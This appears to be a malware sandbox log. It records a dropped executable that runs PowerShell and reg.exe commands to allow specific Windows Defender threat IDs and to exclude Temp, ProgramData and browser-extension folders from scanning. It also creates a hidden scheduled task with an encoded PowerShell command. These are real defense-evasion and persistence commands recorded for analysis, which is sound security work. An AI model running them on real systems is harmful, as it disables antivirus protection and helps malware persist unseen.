C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 11121⤵PID:2240
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 1112 -ip 11121⤵PID:3368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:1012
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 11121⤵PID:816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:2812
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 11121⤵PID:5068
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1112 -ip 11121⤵PID:3676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1112 -ip 11121⤵PID:1776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 11121⤵PID:3500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 11121⤵PID:4440
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1112 -ip 11121⤵PID:224
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 1112 -ip 11121⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 11121⤵PID:1492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 11121⤵PID:768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 11121⤵PID:2880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 11121⤵PID:1204
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1112 -ip 11121⤵PID:2980
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 11121⤵PID:3368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 11121⤵PID:3528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 1112 -ip 11121⤵PID:4304
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 11121⤵PID:688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 11121⤵PID:2008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:4556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 11121⤵PID:3504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1112 -ip 11121⤵PID:3536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1112 -ip 11121⤵PID:4504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1112 -ip 11121⤵PID:2272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1112 -ip 11121⤵PID:4780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 11121⤵PID:4400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1112 -ip 11121⤵PID:1300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1112 -ip 11121⤵PID:2520
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 11121⤵PID:5336
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1112 -ip 11121⤵PID:5448
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:5496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1112 -ip 11121⤵PID:5544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 11121⤵PID:5588
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1112 -ip 11121⤵PID:5632
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1112 -ip 11121⤵PID:5744
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1112 -ip 11121⤵PID:5868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1112 -ip 11121⤵PID:5960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 1112 -ip 11121⤵PID:5152
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1112 -ip 11121⤵PID:5320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1112 -ip 11121⤵PID:5468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1112 -ip 11121⤵PID:5656
-
C:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exeC:\Users\Admin\AppData\Local\Temp\48DD1CqE\LsO2143M1d0.exe z0 /KNdids 757674 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:5936 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5708 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5300
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:2712
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:5336
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:5248
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:5240
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:5236
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:5320
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:1068
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:5388
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:3660
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:5100
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:4820
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6064
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:5400
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:5140
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:5380
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:5512
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:5376
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:740
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:5448
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:392
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6028
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:6076
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:5272
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:5484
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:6000
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:5480
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:5940
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵PID:5932
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AMqhlrBDqRJU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OJBbginKvssDnbEKbsR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\UQtSSXvqU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ezMWJXFFLyUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\hMiQKFvmPLjeC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\CSlqozbqXBZGgaVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\wqgwJMWXAwfbGfvq\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5584 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:323⤵PID:5680
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:324⤵PID:1796
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AMqhlrBDqRJU2" /t REG_DWORD /d 0 /reg:643⤵PID:5712
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:323⤵PID:5728
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OJBbginKvssDnbEKbsR" /t REG_DWORD /d 0 /reg:643⤵PID:5648
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:323⤵PID:5816
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UQtSSXvqU" /t REG_DWORD /d 0 /reg:643⤵PID:5744
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:323⤵PID:5764
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ezMWJXFFLyUn" /t REG_DWORD /d 0 /reg:643⤵PID:4488
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:323⤵PID:3964
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\hMiQKFvmPLjeC" /t REG_DWORD /d 0 /reg:643⤵PID:4944
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:323⤵PID:5812
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\CSlqozbqXBZGgaVB /t REG_DWORD /d 0 /reg:643⤵PID:3584
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:676
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:1444
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵PID:3456
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵PID:3812
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:323⤵PID:4132
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\DMGDvKLKeLwsjNbUi /t REG_DWORD /d 0 /reg:643⤵PID:2996
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:323⤵PID:3680
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\wqgwJMWXAwfbGfvq /t REG_DWORD /d 0 /reg:643⤵PID:5788
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFRDoStOp" /SC once /ST 03:14:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="2⤵
- Scheduled Task/Job: Scheduled Task
PID:2300 -
